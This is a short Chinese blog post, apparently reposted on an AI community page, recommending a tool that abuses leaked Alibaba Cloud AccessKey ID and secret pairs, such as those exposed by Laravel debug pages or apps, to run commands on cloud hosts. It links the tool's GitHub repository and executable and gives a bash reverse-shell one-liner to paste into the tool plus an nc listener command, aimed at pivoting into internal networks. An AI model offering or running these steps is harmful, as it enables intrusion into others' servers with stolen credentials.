【推荐】阿里云主机accesskey利用工具

1、简介在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET（阿里云APIkey），特别是laravel框架得debug信息。APP中也会泄露这些信息.通过这款利用工具我们可以进行命令执行获取到shell然后进行内网渗透。具体的github地址如下:https://github.com/mrknow001/aliyun-acces

安全大哥

5450人浏览 · 2020-12-21 18:37:18

安全大哥 · 2020-12-21 18:37:18 发布

1、简介

在日常渗透过程中我们经常遇到信息泄露出ALIYUN_ACCESSKEYID与ALIYUN_ACCESSKEYSECRET（阿里云API key），特别是laravel框架得debug信息。APP中也会泄露这些信息.通过这款利用工具我们可以进行命令执行获取到shell然后进行内网渗透。

具体的github地址如下:

https://github.com/mrknow001/aliyun-accesskey-Tools

exe文件下载地址:

https://github.com/mrknow001/aliyun-accesskey-Tools/releases/download/1.0/Aliyun-.AK.Tools.exe

工具截图如下:

可在命令输入处输入反弹shell的代码。

bash -i >& /dev/tcp/自己的ip/自己的端口 0>&1

自己的机器执行:

nc -lvvp 端口

魔乐社区（Modelers.cn) 是一个中立、公益的人工智能社区，提供人工智能工具、模型、数据的托管、展示与应用协同服务，为人工智能开发及爱好者搭建开放的学习交流平台。社区通过理事会方式运作，由全产业链共同建设、共同运营、共同享有，推动国产AI生态繁荣发展。

更多推荐

cover

替你试过了，消费级显卡可以跑的开源文生图SOTA模型，顶级渲染、高密度文本绘图

cover

量化挑战赛冠军专访：4小时啃下W4A8量化，我靠的是这些经验

cover

从0到1：魔乐社区贡献者丁一超的大模型量化实战指南

所有评论(0)

查看更多评论

安全大哥

@weixin_39997829

已为社区贡献4条内容